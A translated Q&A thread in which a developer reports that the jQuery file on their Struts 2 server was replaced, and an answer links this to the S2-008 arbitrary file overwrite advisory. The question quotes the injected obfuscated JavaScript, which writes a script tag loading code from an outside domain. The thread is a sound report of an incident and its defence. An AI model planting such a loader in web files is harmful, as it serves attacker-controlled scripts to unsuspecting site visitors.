struts 2獲得服務器根訪問權的問題

Question

現在已經進行了相當長時間的研究（研究不僅限於本網站），但我還沒有看到有關此「所謂」問題的任何討論。

我的朋友告訴我他們在使用struts 2（2.2.1.1）時發現了一個關鍵問題。告訴我，黑客可以獲得對項目目錄的root權限。因此他可以修改項目中的文件。

我之前沒有注意到它。但就在現在，我遇到了同樣的問題。

[聲稱的Bug]：想知道爲什麼在部署我的項目後，所有使用javascript觸發事件的DOM元素在某段時間後都不工作。進一步調查，我發現我上傳到服務器（使用jquery-1.3.2.min.js）的jQuery lib已被替換（其內容）。文件名是相同的，但內容是無法辨認的東西（至少對我來說），見下圖：

var _0xfcda=["\x3C\x53\x43\x52\x49\x50\x54\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x61\x64\x73\x6C\x2E\x63\x6F\x6D\x2F\x73\x70\x63\x6F\x64\x65\x2F\x63\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xfcda[1]](_0xfcda[0]); 

這時候我想起了什麼，我的朋友告訴我。有人可以確認這個bug /問題是否合法，並在此解釋它的全部內容以及如何修復。我認爲這是一個相當大的故障。

注意：我非常肯定，上面的代碼不是我們的。我檢查了我的本地副本，並且代碼是不同的，並且我的本地一切正常。非常確定，除了我之外沒有人知道服務器的根密碼。

注：我將使用最新的struts 2版本，但我認爲這個問題，如果legits，需要作爲對社區的提問/參考進行徹底討論。

Answer 1

我的朋友告訴我他們在使用struts 2 （2.2.1.1）時發現了一個關鍵問題。告訴我，黑客可以獲得對您項目目錄的root權限。因此他可以修改項目中的文件。

我認爲他指的是發現的漏洞之一和announced on December 2011。

您可以閱讀Security Bulletin S2-008的詳細信息。 Struts中

任意文件覆蓋< = 2.3.1（ParameterInterceptor）

當訪問參數中的旗標被allowStaticMethodAccess禁止 因爲Struts的2.2.3.1攻擊者仍然可以訪問公共 構造與只有一個參數鍵入String以創建新的Java 對象並使用 String類型的一個參數訪問其設置器。這可以在示例中被濫用以創建並覆蓋 任意文件。要將禁止的字符注入文件名，可以使用未初始化的字符串屬性。

我不知道這是發生在你身上的事情，但它可能是你的朋友在談論的東西。

我將使用最新的Struts 2的發佈

然後你有（幾乎）完全不用擔心......直到下一個漏洞得到發現和披露，則需要再次升級。

至於那裏的每一個軟件，總是使用最新的（穩定的）版本。